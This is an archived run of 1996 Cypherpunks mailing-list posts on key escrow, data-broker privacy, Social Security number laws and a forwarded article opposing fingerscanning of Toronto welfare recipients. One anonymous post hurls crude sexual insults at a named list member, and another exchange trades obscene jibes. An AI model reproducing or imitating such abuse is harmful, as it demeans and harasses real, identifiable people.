concerning what some "Safe Surf" products actually protect you from, the difference between "indecent" and "harmful to minors" in new Internet censorship laws, as well as your phoned-in questions. 
This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html See URL http://www.digex.net/isptv for more information about the ISP-TV Network From nobody at cypherpunks.ca Fri Sep 20 14:12:56 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sat, 21 Sep 1996 05:12:56 +0800 Subject: A daily warning regarding Tim C[ocksucker] Maya, the lying sack of shit Message-ID: <199609201738.KAA00561@abraham.cs.berkeley.edu> Tim C[ocksucker] Maya studied yoga back-streching exercises for five years so he could blow himself (nobody else will). From froomkin at law.miami.edu Fri Sep 20 14:33:47 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Sat, 21 Sep 1996 05:33:47 +0800 Subject: The GAK Momentum is Building... In-Reply-To: <3240DD33.28B6@gte.net> Message-ID: In this context, I'm just about to revise the draft at http://www.law.miami.edu/~froomkin/articles/planet_clipper.htm comments welcome. **Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"** A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And humid. From Ryan.Russell at sybase.com Fri Sep 20 14:37:02 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Sat, 21 Sep 1996 05:37:02 +0800 Subject: CNET Digital Dispatch Vol. 2 No. 38 Message-ID: <9609201840.AA19437@notesgw2.sybase.com> EDS is a large company Perot used to own.. I worked for them for a short time...a very short time.. Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: osborne @ gateway.grumman.com (Rick Osborne) @ smtp Date: 09/20/96 02:12:22 AM Subject: CNET Digital Dispatch Vol. 2 No. 
38 This week's c|net digital dispatch had the following top ten list. For number 8, did they mean DES or is the EDS something I'm not aware of. I figure it has to be because what does DES have to do with chat rooms? >9. TOP TEN REASONS WHY THE PRESIDENTIAL DEBATES WON'T TAKE >PLACE ON THE WEB > >10. Kemp would fight with Dole over who gets to > "quarterback" the keyboard. >9. Oops: Gore plugged information superhighway cable > into White House central vacuum system. >8. Perot's crack team of EDS hackers would get him > in somehow. >7. Hotwired editors say presidential candidates not > hip enough. >6. Hillary doesn't let the President in ANY chat rooms. >5. Debate commission insists: event must be on Prodigy. >4. Bill Gates owns the rights to online debates. >3. Dole's Selectric won't connect to the Net. >2. Chelsea is using the White House PC to write a > book report. >1. In cyberspace, no one can feel your pain. ____________________________________________________________ Rick Osborne osborne at gateway.grumman.com "The universe doesn't give you any points for doing things that are easy." From unicorn at schloss.li Fri Sep 20 14:41:55 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 05:41:55 +0800 Subject: The GAK Momentum is Building... In-Reply-To: <3240DD33.28B6@gte.net> Message-ID: On Wed, 18 Sep 1996, Dale Thorn wrote: > Lucky Green wrote: > > On Wed, 18 Sep 1996, Jim Ray wrote: > > I agree, and hope so. "Key Recovery," while not as Orwellian-sounding > > as "GAK," is a step on the path to honesty WRT the English language, > > though it's important to continually point out, as Tim did in his > > post, that *access* -- rather than just recovery -- is obviously what > > Mr. Freeh wants. > > I'd count this likely change in terminology as a "cypherpunk victory," > > albeit a very small and certainly a very hard-fought one. > > > Nope. It is a Cypherpunk loss. 
The use of the term "key recovery" for > > GAK now fully obfuscates the distinction between accessing a > > backup copy by the legitimate owner (or his estate, employer, etc.) > > and GAK. Many PKIs will support the former type of key recovery. And > > for good reasons. Thanks to the brainwashers using the same term for > > GAK, it will now become impossible to tell from a basic description of > > a PKI if it supports GAK or not. Furthermore, those who oppose the > > latter type of key recovery (us!), will be pushed further into the > > fringe by the media now being able to mix up our arguments against GAK > > with arguing against true key recovery. [Do you notice the weird > > constructs I have to use to distinguish the two meanings? One of them > > being new...] > > --Lucky > > My comment: Once the big Corp.'s get used to the new game, they'll put > the non-critical stuff out there for Mr. Freeh, and for the really > secret data, if the cops confiscate anything they can't read, the Corp. > security will put it off on a fall-guy, even as high as the CEO if > necessary. I just wanna see one case where a federal judge will try to > bleed a big company for contempt for "refusing" to decode and hand over > some ostensibly encrypted data. Matter of fact, there are probably cases > similar to this that have already been through the appeals courts. Several. Most involve foreign banks refusing to turn over records to U.S. courts. Most result in powerfully large fines imposed on banks, often on a per diem basis. > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From JUDGExMAD at aol.com Fri Sep 20 14:45:33 1996 From: JUDGExMAD at aol.com (JUDGExMAD at aol.com) Date: Sat, 21 Sep 1996 05:45:33 +0800 Subject: cxcxcx Message-ID: <960920142041_526657182@emout12.mail.aol.com> unscribe cypherpunks at toad.com From lharrison at csbh.mhv.net Fri Sep 20 14:49:55 1996 From: lharrison at csbh.mhv.net (Lynne L. 
Harrison) Date: Sat, 21 Sep 1996 05:49:55 +0800 Subject: ANYONES CREDIT CARD # per your request. Message-ID: <9609201825.AA18161@super.mhv.net> At 11:03 AM 9/20/96 EDT, Brian Hills wrote: >Thought this would be appropriate to the list >>Unfortunately, this message needs to be propagated to protect all of us. >> >> Note: Lexis-Nexis is only accepting written or fax requests. You can go to their web page (http://www.lexis-nexis.com), click "Just In" and request via email that your name be removed from their database by filling out the form. Problem, of course, is that one doesn't know if one's name and info is in the database unless one is a subscriber and can look it up. I, personally, do not feel comfortable in filling out a form with my personal info and sending it along - 1) for the obvious reasons; and 2) what if I'm not even in their nefarious database? If not, then I've just entered my personal info and sent it on its merry way to whomever and wherever unnecessarily - whether by email, fax, or snail mail. I tried just entering my name, email address, and state but, as anticipated, received a msg that ALL info has to be supplied, so I'll chk with someone I know that has an account to see if my name is there. However, the BIGGEST problem I foresee with this database (and others like it) is that someone eventually is going to hack it - and then watch the fun and games ensue. ********************************************************** Lynne L. Harrison, Esq. | "The key to life: Poughkeepsie, New York | - Get up; lharrison at mhv.net | - Survive; http://www.dueprocess.com | - Go to bed." DISCLAIMER: I am not your attorney; you are not my client. Accordingly, the above is *NOT* legal advice. 
********************************************************** From aba at dcs.ex.ac.uk Fri Sep 20 15:06:10 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sat, 21 Sep 1996 06:06:10 +0800 Subject: monkey-wrenching GAK In-Reply-To: Message-ID: <199609201023.LAA00097@server.test.net> Tim May writes on cpunks: > Ray Arachellian writes: > >Another thing you can do: generate huge key pairs all day long and submit > >them to the NSA. If enough people do this, they will be flooded and > >overworked [...] > > Ah, but what about the _fee_ for registering a key? You really didn't think > this would be free, did you? I agree. With the aim of enforcing True Names, this might also get tied to an internet drivers license (and your fingerprints (the physical kind), social security number etc, much like car DLs (from the other thread)). > (Note: One of my biggest objections to GAK, besides the political/civil > rights issue, is what it does to systems which generate lots and lots of > keys on an ad hoc, continuing basis. Yeah, kind of wrecks all the current uses of forward secrecy, DH in IP link level encryption; temporary RSA keys, and DH used by SSL, and so on. The fact that these things are currently in world wide use on a large scale presents the US law enforcement with problems. They'd need to "unpublish", and recall a *lot* of software. Some of the non-US folks might not be so keen to do a GAK enabling downgrade. Adam -- exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ #!/bin/perl -sp0777i Message-ID: Dimitri, get a life! We need Dimitri Spams as much as we needed Perrygrams. Which is to say, we need them not at all! 
============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From peter at internetelite.com Fri Sep 20 15:13:00 1996 From: peter at internetelite.com (Peter Hrabinsky) Date: Sat, 21 Sep 1996 06:13:00 +0800 Subject: -- Message-ID: <3242DB00.30B5@internetelite.com> From dlv at bwalk.dm.com Fri Sep 20 15:28:20 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 06:28:20 +0800 Subject: [joke, non-code] Re: Get this for a snake-oil example : In-Reply-To: <843230178.6534.0@fatmans.demon.co.uk> Message-ID: >From paul at fatmans.demon.co.uk Fri Sep 20 10:51:21 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 11:09:22 EDT for dlv Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA19108 for dlv at bwalk.dm.com; Fri, 20 Sep 96 10:51:21 -0400 Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net id ad15131; 20 Sep 96 14:41 GMT Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa06534; 20 Sep 96 15:36 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA843156112 ; Thu, 19 Sep 96 18:01:52 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: "Dr.Dimitri Vulis KOTM" Date: Thu, 19 Sep 1996 18:01:50 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: [joke, non-code] Re: Get this for a snake-oil example : Priority: normal X-Mailer: Pegasus Mail for 
Windows (v2.31) Message-Id: <843230178.6534.0 at fatmans.demon.co.uk> > > Shamster: SHA-enabled biocomputing hamster. > > I'm sure Timmy would like to wrap one up in duct tape and shove it > up his ass... How witty and subtle Hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha 
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha 
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha

You fuckhead

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From alano at teleport.com Fri Sep 20 16:18:37 1996
From: alano at teleport.com (Alan Olsen)
Date: Sat, 21 Sep 1996 07:18:37 +0800
Subject: DL in exchange for fingerprint
Message-ID: <3.0b16.32.19960919224547.00c48460@mail.teleport.com>

At 03:10 PM 9/19/96 -0700, Timothy C.
May wrote:
>At 9:13 PM 9/19/96, Gary Howland wrote:
>>> Paraphrasing that famous quote, just which part of "not for identification"
>>> don't they understand?
>>
>>Hmm - who are you paraphrasing here? (Just curious).
>
>"What part of "No" don't you understand?"
>
>and
>
>"What part of "Congress shall make no law" don't you understand?"

The question as to Social Security numbers came up earlier today in a conversation off-list.

Do any of the lawyer types that hang out here know the exact statutes as to use and misuse of Social Security numbers? My understanding (probably flawed) is that it is (or was) illegal for certain types of businesses to ask for SS numbers. Does anyone know what the actual laws regarding this are? Pointers to statute numbers would also be appreciated.

Also, I noticed that the text "Not for Identification" does not appear on later versions of the Social Security cards. (Comparing my card with my father's showed some interesting differences. That text change was the most glaring.)

---
Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction
`finger -l alano at teleport.com` for PGP 2.6.2 key
http://www.teleport.com/~alano/
"We had to destroy the Internet in order to save it." - Sen. Exon
"Microsoft -- Nothing but NT promises."

From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 20 16:36:47 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Sat, 21 Sep 1996 07:36:47 +0800
Subject: RRE: fingerscanning
Message-ID: <01I9PFEM77JC8Y50ND@mbcl.rutgers.edu>

From: IN%"rre at weber.ucsd.edu" 19-SEP-1996 22:33:45.99
To: IN%"rre at weber.ucsd.edu"
CC:
Subj: fingerscanning

X-URL: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: archive/latest/1308

[For those of you who are just joining us, RRE has been following a controversy in Ontario about the use of biometric encryption to identify welfare applicants in Toronto for purposes of fraud prevention.
Critics assert that welfare applicants are being criminalized under the cover of combatting a fraud problem that doesn't really exist; supporters assert that the new scheme would be less cumbersome for everyone involved than the existing identification methods, and that, unlike most biometric identification schemes, this encrypted scheme does not require the applicant's fingerprint to be captured in a form that could be used for law enforcement or other purposes. The case is important because biometric encryption is a leading example of the "privacy-enhancing technologies" that will become increasingly important as a technical means to reconcile functionality and privacy in technical systems. I honestly do not know which side is right, and I have friends among both supporters and critics of such systems.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Mon, 16 Sep 1996 23:49:23 -0400 (EDT)
From: Sarah Vance
Subject: fingerscanning article

this is an article about fingerscanning that I wrote for University of Guelph's student newspaper, the "Ontarion", with lots of help from Orenda Davis and Jennifer Kohm. It's not as comprehensive as the info doc, but maybe a tad more readable.

sooooo please. forward. reprint. etc.

Solidarity,
Sarah

______

A new threat to the privacy and autonomy of all Canadians received government's stamp of approval over the summer when Metro Toronto Council approved a plan to fingerscan area welfare recipients.
Politicians claim that this will cut costs by reducing welfare fraud, which is estimated at under 3% of Social Service expenditures.

Social Justice advocates question the fairness and fiscal responsibility of paying a consortium led by three large corporations, the Royal Bank, Great West Life Assurance Co., and Unisys Canada, millions of dollars to develop the program when welfare fraud is such an insignificant problem. The decision seems particularly questionable since New Zealand recently abandoned a similar system, having found that its costs far outweighed its benefits.

A key reason for implementing the program, explains Metro's Human Services Committee report, is to make municipal Social Services compatible with provincial government plans to use biometric identification to "cover a range of programs". In Spain biometrics have been used for Unemployment benefits, and in the United States a bill was recently discussed that would have used it for a host of programs, including health care and immigration. Technology companies, such as Mytec, are promoting fingerscanning for these services in Canada as well.

Fingerscanning is often confused with fingerprinting, although there are substantial differences. In fingerscanning, a machine takes your fingerprint pattern and converts it into a unique set of numbers and letters. A central computer database holds these codes, which can be accessed by authorized groups. For Metro's plan, the system would be designed to catch people trying to receive extra benefits by applying for welfare under different aliases.

The proposition raises the specter of corporate control over the welfare system by threatening to bring in private sponsorship. Metro Committee documents emphasize "the further exploration of the feasibility of C.I.B.S. [the fingerscanning plan] applications to other corporate initiatives."
The Committee's suggestions for the future of the welfare system include "obtaining credits for our customers from various suppliers - supermarket chains, drug chains, educational institutions, dental clinics, property management companies, clothing stores.."

Although this may sound fairly innocuous, it erodes the privacy and freedom of choice of people struggling below the poverty line. Presently, program benefits like dental care only cover certain services, and are available to limited cash amounts. The Committee's report suggests that corporate credits, such as those from grocery or clothing stores, would be handled in the same way: the government would control both the type of goods individuals purchase and the amount they spend on food, education, and other necessities. It makes it possible for politicians to decide things like whether or not it is acceptable for poor people to buy cigarettes or junk food. It is not inconceivable that in the future this power could deny low income people freedom over choices as personal as buying birth control.

As well, those reliant on benefits would have to buy from corporate sponsors. It would be irrelevant if their prices were relatively expensive, their location inconvenient, or their policies in conflict with an individual's cultural or political values. Currently, the government records the location, time, and details of dental benefit transactions. It is likely that credits from drug stores and other corporate sponsors would be monitored in the same way.

In spite of this, Metro Councilors are so enamored with the fingerscanning proposal that they are prepared to recommend it for nationwide use. Toronto's Department of Social Services even hopes to make some revenue off its expansion by selling the scheme to other jurisdictions.

The spread of biometric identification happened similarly in the United States. In recent years, its use on welfare recipients has become increasingly prevalent.
As the idea of biometrically identifying the public has become more socially accepted, federal politicians have started considering its usefulness for a myriad of services and personal information. In February, Congress discussed a bill that would have used fingerscanning to develop a centralized database containing personal information on every adult in the country. This data was to be made available to a variety of government and corporate interests. Even those claiming to be potential employers would have had access to an individual's immigration, welfare, and health records. In Toronto, assistance recipients can be seen as the test case for widespread use of fingerscanning in Canada--the beginning of a slippery slope.

The Royal Bank's involvement in fingerscanning Metro welfare recipients is particularly problematic. If the plan is implemented, all 31 200 of Toronto assistance recipients who do not currently have bank accounts will be forced to access their benefits from an account set up for Social Services by the Royal Bank. The only way they will be able to do this will be through bank machines: The Royal Bank is not interested in investing the time and resources necessary to personally service these "clients". Instead, they have agreed to provide a training session in which these people will be shown how to use bank machines. However, unless this session 1) trains people not to have mental illness 2) dismantles the cultural barriers to using bank machines and 3) teaches people to read and write English or French, many of these 31 200 people and their families will have great difficulty accessing their assistance funds.

There is also a question of who will pay for Royal Bank user fees. Brett Fleming, a Bank executive involved in the negotiations, has stated that "we'll all have to bear some of the pain". They have kindly offered to forfeit the profits for at least two user charges per month.
Fleming claims that Metro Social Services will likely cover 5 more Interac charges per month for each of these recipients. At current rates, this would cost taxpayers $2 340 000 a year... Fortunately for Brett, it seems that the Royal Bank's "pain" will be minimal.

Activists in the United States are finding it difficult to eliminate the practice of fingerscanning, as it has quickly become entrenched in American public policy. In Canada, biometric identification is new enough that it can be challenged more easily. Legal and social justice groups are already mounting campaigns to put an end to Metro's plans before the deal is finalized.

A group based in Guelph has formed with the goal of forcing the Royal Bank to withdraw from the consortium, making it difficult for the program to proceed. The campaign's strategy is to use a boycott to draw negative attention to the Royal Bank, forcing them to question whether they are willing to risk their reputation for the fingerscanning plan. The campaign is urging people across the province to withdraw their student loans, accounts, and RRSPs from the Bank.

If you are interested in getting more information on Metro's fingerscanning plans, or in joining the fight against it, contact Orenda Davis @ (519)763-5292 , or Sarah Vance @ (519)763-6726 .

____________________________________________________________________________

FIGHT FINGERSCANNING! (it IS possible)

Join the province-wide campaign against fingerscanning, based right here in Guelph

Make funds and support available for people on welfare who risk not to be scanned

Donate resources.... photocopying, faxing, use of phones, artistic talent, your TIME, your skills

BOYCOTT THE ROYAL BANK. Put pressure on them to withdraw from the consortium. People have already pulled their student loans, accounts, and RRSPs from the Bank

Contact: Orenda Davis (519)763-5292 , or Sarah Vance (519)763-6726 .

Date: Mon, 16 Sep 1996 23:22:19 -0400 (EDT)
From: Sarah Vance
Subject: at last... the fingerscanning info doc. (fwd)

[...]

METRO TORONTO AND THE FINGERSCANNING SCHEME: SOME OF THE FACTS THEY AREN'T TELLING US

For the last few years some of the people from Metro social services have been working with large corporations to develop a program for fingerscanning people on welfare. On June 19, 1996 Metro Toronto Council passed a decision recommending that this program be implemented as soon as possible, probably starting at the beginning of 1997. The program is complicated, and full of very serious problems that have not been discussed in the mainstream media. Soooo... I've tried to use plain English to explain what's going on, and how fingerscanning will affect people on welfare, and society in general if it is implemented. If parts of this "report" aren't clear, or if it is missing any important info please contact me (sarah) so I can revise it. (my number and email are listed at the end)

PART I: THE BASICS... WHAT IS IT AND HOW WOULD IT WORK?

What is biometric identification?
-the use of someone's body to identify them, whether it's by fingerscanning, retinal scans etc..

What happens to someone when they get fingerscanned?
-when you apply for welfare you would put a couple of your fingers into the scanning machine. That machine takes your fingerprint pattern and converts it into a unique set of numbers and letters, a "bioscrypt". It's kind of like having your fingerprint turned into a bar code that is held in the computer's database.

Who has access to the fingerscans?
The bar code is, at least according to the information I've been able to find, accessible to anyone. It is just stored in the computer, so that the computer won't accept your fingerprint (or bar code) if you try to apply for welfare again. Metro council is recommending that the bar codes be destroyed three months after someone goes off of social assistance. According to them, the only person who could access these numbers would be the person responsible for maintaining the system.
This person only accesses the system periodically to make sure that bioscrypts have been destroyed at the appropriate time.

How often will people on welfare have to be fingerscanned?
-although Metro officials say that people will only be fingerscanned when they register for welfare, Metro Committee documents imply that biometric id will be used more often than that...

Human Services Committee Report #8, pg.11, (A) improving customer identification says..
"CIBS will address...ongoing confirmation of identity" (I underlined that)
"Biometric technologies give customers a fast, non-intrusive and very reliable way to provide indisputable proof of identity - even if they have no other identification."

but, since other id like a driver's licence etc.. will still have to be used for enrollment, the only way this statement can be true is if Metro is planning on fingerscanning people on welfare at other times as well.

("CIBS" is what they're calling the program, it stands for "Client Identification and Benefit System")

Who is getting paid to develop this program?
-the Royal Bank, Great West Life Assurance, and Unisys Canada are heading the group (or "consortium") that has won this contract

What is the Royal Bank's role in fingerscanning?
-they are providing a Metro Social Services Royal Bank account that anyone on welfare who doesn't currently have a bank account will get their money from

What is Great West Life Assurance's role?
-they are developing a benefits card that welfare recipients will use at the dentist's etc. instead of vouchers

What is Unisys' role?
-right now Unisys wants to provide the computer administrative backup for the program. They also have biometric identification technology which they hope to sell to Metro social services.

Who is providing the biometric technology for this project?
-they haven't finalized which particular type of biometric id they will use yet (it will almost certainly be fingerscanning) once they do decide, THEN they will start negotiating contracts with people that sell the technology...among these corporations are Unisys Canada and Mytec.

How would the system change the way people get access to their money?
-people who already have bank accounts will get their money direct deposited into their accounts (for many the way they access their money won't change)
-people who don't have bank accounts get Royal Bank cards that they'll take to Royal Bank machines to withdraw their money. As of yet, there are no provisions for people to get their money any way other than by using a Royal Bank machine--they won't be allowed to go to tellers to take out their money. No one is sure about what provisions will be made for bank user fees--i.e. Interac charges.

Where else is this happening?
-In several places across the US (eg. Los Angeles and Alameda Counties, in California, Ohio etc..)
-In Spain fingerscanning is being used on the unemployed

How soon is Metro Toronto hoping to implement it?
-They hope to finish their negotiations and start implementing fingerscanning as early as January of 1997.

Would fingerscanning be mandatory?
-no. at first it would only be coerced (see the section on risks of refusal, under part 7). But Metro council recommended making it mandatory in the future. Right now their lawyers are advising them that they will run into serious human rights battles if they try to make fingerscanning mandatory right away.

PART 2: SPEAKING THEIR LANGUAGE...THE MONEY ARGUMENT

How much fraud is there in the welfare system??
-between 0.5% and 3% of welfare cases are fraudulent (ie "double-dippers"--meaning that they are receiving cheques from more than one office). This figure has been confirmed by Liberal and NDP studies, and it includes administrative errors.
-one Metro councillor has stated that fraud is actually no more than 0.5%
-of the 10 000 calls received by Metro's fraud line, only 0.7% were confirmed as double-dippers (globe, June 20) most of the people that were reported weren't even on welfare
-when discussing the amount of fraud in the welfare system it is essential to ask why people on social assistance commit fraud. This requires acknowledging that in 1993 (before the 21.6% cut to assistance cheques) maximum welfare payments were still well below Stats Canada's poverty line

How much of taxpayer's money will it cost to install the system?
-$4-8 million to install for Metro (globe and mail, june 20)
-the cost of installation is still being negotiated
-as far as I know, no one involved in the planning of the project has released estimates of the cost of training social service workers to use the system, of changing the computer filing system, of maintaining the new system etc... but these costs are sure to be substantial

Will taxpayer's money be used to pay for the royal bank for user fees so that social assistance recipients can get bank accounts (even though that's not what many of them want)?
yep.

If people get bank accounts, won't they get service charges as well?
-"We'll all have to bear some of the pain", says Bank executive Brett Fleming. He claims that the Royal Bank will probably pay for at least two uses of Interac per month per recipient, and that social services will probably pay for 5 more.

So... if, as Brett Fleming estimates, Metro pays for recipients to get 5 free uses of Interac per month, how much will that cost?
-there are 104 000 social assistance cases in Metro, 30% of them don't presently have bank accounts and therefore will have pseudo accounts set up at the Royal. That means that 31 200 new accounts will be set up at the royal for welfare recipients.

FOR ONE MONTH
  31 200 accounts
  x $6.25 (5 interac charges @ $1.25/each)
  = $195 000 per month in cost to taxpayers --> additional Bank profit

FOR ONE YEAR
  $195 000 /month
  x 12 months
  = $2 340 000 per year in cost to taxpayers --> additional Bank profit

FOR FIVE YEARS
  $2 340 000 /year
  x 5 years
  = $11 700 000 in five years in cost to taxpayers --> additional Bank profit***

***note: this calculation is made under the assumption that Interac charges will not increase in the next five years, and that welfare rolls will remain the same size

But can't these costs be avoided by encouraging assistance recipients to use Royal Bank branches rather than bank machines?
no. Assistance recipients who are provided with pseudo Royal Bank accounts will not be allowed to use bank branches, they will only be allowed to use bank machines.

What is vendor fraud and will the system help to decrease it?
-vendor fraud is fraud committed by professionals who provide government paid benefits to people on welfare (eg. dentists). Although the Royal Bank has stated that the thrust of the whole program is to decrease vendor fraud little proof has been provided so far that this will actually happen.
-they argue that the paper vouchers that used to be used by welfare recipients to pay for dental repairs, for instance, can fairly easily be reproduced making it easy for vendors to charge the government for more services than they actually provide. These paper vouchers are to be replaced by electronic cards so that the problem of duplication will be eliminated. It is possible that the benefit card could deter vendor fraud to some extent; However vendor fraud can easily occur in other ways (eg. By overcharging for services, or by charging for services that aren't necessary....)
-Also, and most importantly, deterring vendor fraud has nothing to do with biometrically identifying welfare recipients.
If Metro Toronto wishes to use the benefit card to deter fraud (although the merits of this system are dubious) this could more inexpensively be done, and more sensibly be done, without being attached to biometrical identification of the poor.

Will fingerscanning save money in the long run?
-This is questionable: New Zealand instituted this system, but ended up abandoning it because its costs of implementation and maintenance far outweighed the amount saved from reduced fraud.

PART 3: STIGMATIZATION

-Metro argues that they aim to decrease stigmatization of welfare recipients by replacing cheques with bank cards, but at the same time they are thinking about using this system to start forcing poor people to use welfare benefit cards instead of cash for food, clothing, tuition and other basic needs.

How does this criminalize welfare recipients?
-some people argue that the only reason fingerscanning is seen as criminalizing is because it is confused with fingerprinting. It is true that fingerscanning technology is quite different from actual fingerprinting, but this does not erase the common element shared by both techniques: When a person is fingerprinted by the police it is because they are suspected of a crime, they are considered suspicious and are therefore scrutinized. When a person is fingerscanned for welfare it is also because they are suspected of a crime. The crime is fraud, and by virtue of being poor and dependent on state funds you are automatically considered suspicious and therefore scrutinized.
-by spending millions on this system the government is helping to perpetuate the myth that our economic problems are caused by the poor.

PART 4: ISSUES OF ACCESS

Will fingerscanning make it easier for people who don't have "proper" identification to register for benefits?
-NO. Even though this argument is often put forward, you will still have to have exactly the same types of identification to apply for welfare.
Metro Human Services Committee report reads, "Conventional forms of identification (e.g. driver's licence, birth certificate) will continue to be required to establish initial eligibility for social assistance." (p.11, (A) Improving Customer Identification)

If welfare recipients are only allowed to withdraw money from bank machines, how will people who have mental illnesses; do not read English or French; or have cultural or personal reasons for not using bank machines; be able to get their money?
